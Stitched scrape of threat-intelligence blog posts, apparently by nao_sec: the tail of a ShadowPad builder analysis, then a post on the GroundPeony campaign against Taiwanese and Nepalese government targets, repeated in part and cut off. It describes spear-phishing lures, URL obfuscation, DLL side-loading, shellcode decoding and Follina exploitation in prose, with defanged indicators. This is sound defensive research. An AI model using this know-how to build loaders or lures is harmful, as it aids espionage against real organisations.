on the characteristics of the loader used in the attack on Kyrgyzstan. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2 </code></pre></div></div> We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder. <h2 id="caspervmakerhttpx86">CasperVMakerHTTPx86</h2> <table> <tbody> <tr> <td>MD5</td> <td>eb99580e0d90ee61b3e2e3bd8715c633</td> </tr> <tr> <td>SHA-1</td> <td>706482eda6d747ca2688cdfd97399f800da9e73c</td> </tr> <tr> <td>SHA-256</td> <td>b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6</td> </tr> </tbody> </table> <img src="https://nao-sec.org/assets/2024-07-01/5.png" alt="" /> When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings. <ul> <li>First</li> <li>Install</li> <li>Inject</li> <li>Online</li> <li>Proxy</li> <li>DNS</li> </ul> These items are very similar to the reported architecture of ShadowPad<a href="#fn:5" class="footnote" rel="footnote">5</a>. This suggests that these tabs are configuration items for each module. The settings for each item are as follows: <img src="https://nao-sec.org/assets/2024-07-01/6.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/7.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/8.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/9.png" alt="" /> <img src="https://nao-sec.org/assets/2024-07-01/10.png" alt="" /> Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. If the build is successful, an EXE file and a DLL file are created. <img src="https://nao-sec.org/assets/2024-07-01/11.png" alt="" /> The EXE file is a legitimate AppLaunch. It loads the mscoree.dll in the same directory via DLL Side-Loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally. <img src="https://nao-sec.org/assets/2024-07-01/12.png" alt="" /> <h2 id="comparison-with-similar-samples">Comparison with Similar Samples</h2> ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants. <img src="https://nao-sec.org/assets/2024-07-01/13.png" alt="" /> There are many samples with similar characteristics, but we will introduce two of them. <h3 id="sample-1">Sample-1</h3> According to Macnica’s report<a href="#fn:2" class="footnote" rel="footnote">2</a>, Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same. <img src="https://nao-sec.org/assets/2024-07-01/14.png" alt="" /> <h3 id="sample-2">Sample-2</h3> A report released by the FBI in December 2021<a href="#fn:6" class="footnote" rel="footnote">6</a> reported an attack exploiting CVE-2021-44515 where ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad. Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. Although API Hashing is not used, it is a highly similar sample. <img src="https://nao-sec.org/assets/2024-07-01/15.png" alt="" /> <h2 id="shadowpad-community">ShadowPad Community</h2> As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 2021<a href="#fn:5" class="footnote" rel="footnote">5</a>, ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training)<a href="#fn:7" class="footnote" rel="footnote">7</a>. As various researchers have reported<a href="#fn:2" class="footnote" rel="footnote">2</a><a href="#fn:5" class="footnote" rel="footnote">5</a><a href="#fn:6" class="footnote" rel="footnote">6</a><a href="#fn:8" class="footnote" rel="footnote">8</a><a href="#fn:9" class="footnote" rel="footnote">9</a><a href="#fn:10" class="footnote" rel="footnote">10</a><a href="#fn:11" class="footnote" rel="footnote">11</a><a href="#fn:12" class="footnote" rel="footnote">12</a><a href="#fn:13" class="footnote" rel="footnote">13</a><a href="#fn:14" class="footnote" rel="footnote">14</a><a href="#fn:15" class="footnote" rel="footnote">15</a><a href="#fn:16" class="footnote" rel="footnote">16</a><a href="#fn:17" class="footnote" rel="footnote">17</a><a href="#fn:18" class="footnote" rel="footnote">18</a><a href="#fn:19" class="footnote" rel="footnote">19</a><a href="#fn:20" class="footnote" rel="footnote">20</a><a href="#fn:21" class="footnote" rel="footnote">21</a><a href="#fn:22" class="footnote" rel="footnote">22</a><a href="#fn:23" class="footnote" rel="footnote">23</a><a href="#fn:24" class="footnote" rel="footnote">24</a><a href="#fn:25" class="footnote" rel="footnote">25</a><a href="#fn:26" class="footnote" rel="footnote">26</a><a href="#fn:27" class="footnote" rel="footnote">27</a><a href="#fn:28" class="footnote" rel="footnote">28</a><a href="#fn:29" class="footnote" rel="footnote">29</a><a href="#fn:30" class="footnote" rel="footnote">30</a><a href="#fn:31" class="footnote" rel="footnote">31</a><a href="#fn:32" class="footnote" rel="footnote">32</a><a href="#fn:33" class="footnote" rel="footnote">33</a><a href="#fn:34" class="footnote" rel="footnote">34</a><a href="#fn:35" class="footnote" rel="footnote">35</a><a href="#fn:36" class="footnote" rel="footnote">36</a><a href="#fn:37" class="footnote" rel="footnote">37</a><a href="#fn:38" class="footnote" rel="footnote">38</a>, many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick. As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT41<a href="#fn:39" class="footnote" rel="footnote">39</a>, Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD. <img src="https://nao-sec.org/assets/2024-07-01/16.png" alt="" /> In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is generally because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions in this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? ShadowPad and RoyalRoad RTF Weaponizer may be shared through the same channels. <img src="https://nao-sec.org/assets/2024-07-01/17.png" alt="" /> <h2 id="conclusion">Conclusion</h2> In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad. We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you. <h2 id="acknowledgments">Acknowledgments</h2> We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you. <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:2" role="doc-endnote"> マクニカ, “標的型攻撃の実態と対策アプローチ第5版日本を狙うサイバーエスピオナージの動向 2020年度”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:2:1" class="reversefootnote" role="doc-backlink">↩2</a> <a href="#fnref:2:2" class="reversefootnote" role="doc-backlink">↩3</a> </li> <li id="fn:3" role="doc-endnote"> nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html <a href="#fnref:3" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:4" role="doc-endnote"> nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html <a href="#fnref:4" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:5" role="doc-endnote"> SentinelOne, “ShadowPad A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ <a href="#fnref:5" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:5:1" class="reversefootnote" role="doc-backlink">↩2</a> <a href="#fnref:5:2" class="reversefootnote" role="doc-backlink">↩3</a> </li> <li id="fn:6" role="doc-endnote"> FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf <a href="#fnref:6" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:6:1" class="reversefootnote" role="doc-backlink">↩2</a> </li> <li id="fn:7" role="doc-endnote"> HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ <a href="#fnref:7" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:8" role="doc-endnote"> Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/ <a href="#fnref:8" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:9" role="doc-endnote"> Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/ <a href="#fnref:9" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:10" role="doc-endnote"> ESET, “Connecting the dots: Exposing the arsenal and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/ <a href="#fnref:10" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:11" role="doc-endnote"> ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ <a href="#fnref:11" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:12" role="doc-endnote"> マクニカ, “標的型攻撃の実態と対策アプローチ第4版日本を狙うサイバーエスピオナージの動向 2019年度下期”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf <a href="#fnref:12" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:13" role="doc-endnote"> PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs <a href="#fnref:13" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:14" role="doc-endnote"> CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ <a href="#fnref:14" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:15" role="doc-endnote"> Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/ <a href="#fnref:15" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:16" role="doc-endnote"> Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf <a href="#fnref:16" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:17" role="doc-endnote"> Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage <a href="#fnref:17" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:18" role="doc-endnote"> Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf <a href="#fnref:18" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:19" role="doc-endnote"> TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf <a href="#fnref:19" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:20" role="doc-endnote"> ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ <a href="#fnref:20" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:21" role="doc-endnote"> Positive Technologies, “Higaisa or Winnti? APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ <a href="#fnref:21" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:22" role="doc-endnote"> Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf <a href="#fnref:22" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:23" role="doc-endnote"> Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan <a href="#fnref:23" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:24" role="doc-endnote"> TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf <a href="#fnref:24" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:25" role="doc-endnote"> Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis <a href="#fnref:25" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:26" role="doc-endnote"> Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf <a href="#fnref:26" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:27" role="doc-endnote"> SentinelOne, “Moshen Dragon’s Triad-and-Error Approach Abusing Security Software to Sideload PlugX and ShadowPad”, https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ <a href="#fnref:27" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:28" role="doc-endnote"> TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf <a href="#fnref:28" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:29" role="doc-endnote"> Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ <a href="#fnref:29" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:30" role="doc-endnote"> Kaspersky, “Attacks on industrial control systems using ShadowPad”, https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ <a href="#fnref:30" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:31" role="doc-endnote"> ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/ <a href="#fnref:31" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:32" role="doc-endnote"> Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns <a href="#fnref:32" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:33" role="doc-endnote"> Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor <a href="#fnref:33" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:34" role="doc-endnote"> TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html <a href="#fnref:34" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:35" role="doc-endnote"> Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf <a href="#fnref:35" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:36" role="doc-endnote"> Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks <a href="#fnref:36" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:37" role="doc-endnote"> Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ <a href="#fnref:37" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:38" role="doc-endnote"> TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html <a href="#fnref:38" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:39" role="doc-endnote"> United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer <a href="#fnref:39" class="reversefootnote" role="doc-backlink">↩</a> </li> </ol> </div>
GroundPeony: Crawling with Malice

Tue, 22 Aug 2023 03:00:00 -0000

This blog post is based on “GroundPeony: Crawling with Malice” that we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present. https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/ Presentation material (PDF) is here. Abstract In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we will first provide an overview of this attack campaign and share the analysis results of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan. As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption, and trace back to past attack campaigns. Past campaigns include attacks that exploted the CVE-2022-30190, known as Follina, at the zero-day stage. These studies enable to understand attacker’s motivations and attack backgrounds. This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia including Taiwan that have never been reported so far, and to take concrete countermeasures. GroundPeony The name “GroundPeony” was created by us and is not generally known. Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC33471 by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal. There are two points to note about this group. First, GroudPeony exploits zero-day vulnerability. Specifically, it was the earliest exploiting CVE-2022-30190, also known as Follina. Follina itself is not very complex vulnerability, but it is speculated that this group could develop or have access to a zero-day. This is very interesting. Second, GroundPeony compromised websites for malware distribution. In the past case, Nepal’s government website was compromised. For these reasons, GroundPeony is considered to be an APT group with high attack skill and attack motivation. Timeline This is a quick look at GroundPeony’s attack timeline. The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know is from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries. After that, we forgot about them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we will deal with the case of April 2022 and March 2023. Latest Attack Flow Let’s look at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023. The attack started from spear-phishing email. The email has a DOC file attached. And, a URL is written in the DOC file, and the ZIP file is downloaded by the URL. The ZIP file contains EXE file and DLL file. And executing them, infects malware. The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. This time, I put a mosaic in the image, but the destination was the Taiwanese government organication. Also, the source is cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”. When open the attached DOC file, it looks like this. It pretends to have an error instead of something like a file name. It says to apply an update to resolve the error. The URL is written for the download of the update. When try to download the update file from this URL, it actually downloads ZIP file containing malware. The URL used at this time is very strange. At first glance, it may look like a legitimate Microsoft website. But, due to the structure of the URL, the original host information is Cuttly. When access this URL, you will access to Cuttly. And it will redirect to ZIP file. At this time, the URL redirected from Cuttly was the website of a Taiwanese educational institution. But, this website was compromised, and a ZIP file containing malware was placed. The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like Windows trash box. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware. By the way, did you notice that the update number written in the DOC file and the ZIP file are different? We don’t know if this was simply a mistake by the attacker or a remnant of another ongoing attack campaign. Malware Analysis Let’s take a look at how malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe. But the behavior is the same. When the EXE file is executed, the 4 files placed in $RECYCLE.BIN will be copied to the mic directory under the ProgramData directory. At this time, the names of the 4 files are also changed. The 4 files are renamed to mic.exe, version.dll, mic.doc and mic.ver. And then, mic.exe is executed. mic.exe is a legitimate file with a digital signature. But, it loads version.dll which exists in the same directory. When version.dll is executed by DLL Side-Loading, it loads and decrypts mic.doc. The decryption result is malware we call “micDown” mic.exe Legitimate EXE file with a digital signature version.dll DLL for Side-Loading Shellcode launcher for mic.doc mic.doc Shellcode downloader (micDown) mic.ver Config file for micDown Decoding of version.dll process is in two steps. First version.dll decodes mic.doc and executes it as shellcode. The shellcode further decodes itself and continues execution. The export function of version.dll is very simple. First, it reads mic.doc into the memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor add instructions. When decoding is complete, the process moves to the memory area where the decoded shellcode is located. The decoded shellcode uses the same custom XOR algorithm as before. The RtlDecompressBuffer is then used to decompress. The shellcode is decoded from the beginning of the file, excluding jump instruction. The decoded code executes the executable with the MZ header removed. It also decodes the data in mic.ver and uses it as a configuration. Finally, it downloads and executes the shellcode from the C&C server, saved in the config. The shellcode is encoded with an algorithm similar to that of a previous file. It differs slightly from the file encoding algorithm in that the order of the add,sub,xor instruction is swapped. The encoded config consists of a 0x40 byte C&C host area and a 0x2 byte port area. The IP address at this time was 103[.]199.17.184. Related File An attack similar to the Taiwanese attack we have previously described was also carried out in Nepal. Although the specific origin of the attack is unknown, a legitimate website was compromised and a ZIP file was installed, as was the case in Taiwan. The legitimate website that was compromised was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership2. It is unclear what this has to do with the attacking campaing. In the attack against Nepal, app.onedrivo[.] com was used as the C&C server. The domain was taken using PublicDomainRegistry. More on this domain later. In the attack against Nepal, the malware behaves the same way. When the EXE file is executed, it copies and renames the file and executes mic.exe. mic.exe sideloads version.dll. Then version.dll will read, decode and execute mic.doc. The malware executed was the same as the previous one, called micDown. Related Past Campaign The C&C server used in the previous attack on Nepal has been used in other attacks in the past. The attack on Nepal occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina. Finally, the CobaltStrike beacon is executed. This domain was used as the server to download this CobaltStrike and as the C&C server. The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know the authenticity of this accusation. This DOCX file contains the external link settings. This will load the HTML file. The HTML file contains JavaScript code to change the location. The modified location is written with the scheme ms-msdt. This is the scheme for the Microsoft Support Diagnostic Tool. However,a bug existed in this that allowed PowerShell code to be executed. So, PowerShell code to be executed from a DOCX file. The PowerShell code is downloaded, extracted and executed to a CAB file from the server. Inside the CAB file is an EXE file made by PyInstaller. This EXE is a downloader. And can be downloaded from onedrivo[.]com and run the CobaltStrike beacon. Attribution Let us consider the attribution of this group. To begin with, it is important when this group was exploiting Follina. Follina was finally exploited by a very large number of APT groups. But that was after the details were made public. Here is the timeline. The first time Follina became known to the public was through our tweets. We discovered the Follina sample against Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released. Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. However, Microsoft did not acknowledge it as a vulnerability at that time. The attack reported is also against Belarus. Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India. We believe this is the earliest Follina sample. And these are the attacks by the group Mandiant calls UNC3347, which we call GroundPeony. In other words, GroundPeony was exploiting Follina during a perfect zero-day period. Various organizations have written reports about Follina exploits, but China-nexus is the only group that has exploited Follina during zero-day periods. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access. Let’s look at another indicator. We analyzed an EXE file made by PyInstaller that is executed after the Follina exploit. The PyInstaller binary can easily decompile the Python code. The extracted file looked like this. A large amount of Chinese comments were written. Also, the code was copy-pasted from various public repositories, but most of it was written by Chinese developer. This is a very elementary mistake. However, it is highly likely that the person who created the malware is a native Chinese speaker. We tried mapping the victim (or presumed to be). A very interesting diagram. What does this mean? Based on our previous research, we have created a diamond model. GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. The attacks begin with spear phishing emails. They compromised legitimate websites and use them for their attacks. There was nothing unique about the IP addresses used, and no connection to the victim country could be found. GroundPeony also provides zero-day access. Besides popular tools such as CobaltStrike, they also use group’s original malware. Wrap-Up GroundPeony is an APT group of which little is known so far. It is believed to be China-nexus. It is targeting East and South Asian countries like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. One point worth noting is their use of zero-day. Follina was exploited in its early period. This group also compromised legitimate websites and install malware. GroundPeony is an aggressive APT group. Please keep an eye on their future developments. IoC 103[.]199.17.184 160[.]20.145.111 172[.]93.189.239 *.onedrivo[.]com 1992b552bdaf93caeb470f94b4bf91e0157ba4a9bb92fb8430be946c0ddabdeb 425630cc8be2a7dc2626ccd927bb45e5d40c1cb606bb5b2a7e8928df010af7c9 fa6510a84929a0c49d91b3887189fca5a310129912d8e7d14fed062e9446af7e 142a027d78c7ab5b425c2b849b347952196b03618e4ad74452dbe2ed4e3f73cd d1989ca12426ed368816ce00f08975dc1ff1e4f474592523c40f9af344a57b49 6e13e5c7fcbafc47df259f2565efaed51bc1d021010c51673a7c455b5d4dad2b ef611e07e9d7e20ed3d215e4f407a7a7ca9f64308905c37e53df39f8a5bcbb3c 7b814e43af86a84b9ad16d47f9c74da484ea69903ef0fbe40ec62ba123d83a9a f3e0a3dd3d97ccc23c4cee0fd9c247dbe79fbf39bc9ae9152d4676c96e46e483 50182fca4c22c7dde7b8392ceb4c0fef67129f7dc386631e6db39dec73537705 References Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 ↩ Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html ↩

<img src="https://nao-sec.org/assets/2023-08-22/top.png" alt="" /> This blog post is based on “GroundPeony: Crawling with Malice” that we presented at HITCON CMT 2023. We are grateful to HITCON for giving us the opportunity to present. <a href="https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/">https://hitcon.org/2023/CMT/en/agenda/e8fe6942-9c60-419a-b9a0-dbda80a27ad0/</a> Presentation material (PDF) is <a href="https://github.com/nao-sec/materials/blob/master/HITCON2023/GroundPeony_Crawling_with_Malice.pdf">here</a>. <h2 id="abstract">Abstract</h2> In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders. In this post, we will first provide an overview of this attack campaign and share the analysis results of the malware used. Through this, the reader will be able to understand the latest attack cases targeting Taiwan. As a result of our investigation, we suspect that this attack campaign was orchestrated by a China-nexus attack group. We will discuss the specific evidence supporting this assumption, and trace back to past attack campaigns. Past campaigns include attacks that exploted the CVE-2022-30190, known as Follina, at the zero-day stage. These studies enable to understand attacker’s motivations and attack backgrounds. This post will enable SOC analysts, IR team members, CSIRT personnel, and others to gain a deep understanding of the latest APT attack trends targeting East and South Asia including Taiwan that have never been reported so far, and to take concrete countermeasures. <h2 id="groundpeony">GroundPeony</h2> The name “GroundPeony” was created by us and is not generally known. Based on our reading of the few public reports, we believe they are identical or close to the group dubbed UNC3347<a href="#fn:1" class="footnote" rel="footnote">1</a> by Mandiant. Active since at least 2021, it targets government organizations in East and South Asia, specifically Taiwan and Nepal. There are two points to note about this group. First, GroudPeony exploits zero-day vulnerability. Specifically, it was the earliest exploiting CVE-2022-30190, also known as Follina. Follina itself is not very complex vulnerability, but it is speculated that this group could develop or have access to a zero-day. This is very interesting. Second, GroundPeony compromised websites for malware distribution. In the past case, Nepal’s government website was compromised. For these reasons, GroundPeony is considered to be an APT group with high attack skill and attack motivation. <h2 id="timeline">Timeline</h2> This is a quick look at GroundPeony’s attack timeline. <img src="https://nao-sec.org/assets/2023-08-22/timeline.png" alt="" /> The malware has existed on VirusTotal since around 2021. The oldest attack campaign we know is from April to June 2022. Around this time, Follina was exploited to attack Nepal, India, and other countries. After that, we forgot about them for a while, but they started attacking again around March 2023. At this time, they attacked Taiwan and Nepal. In this post, we will deal with the case of April 2022 and March 2023. <h2 id="latest-attack-flow">Latest Attack Flow</h2> Let’s look 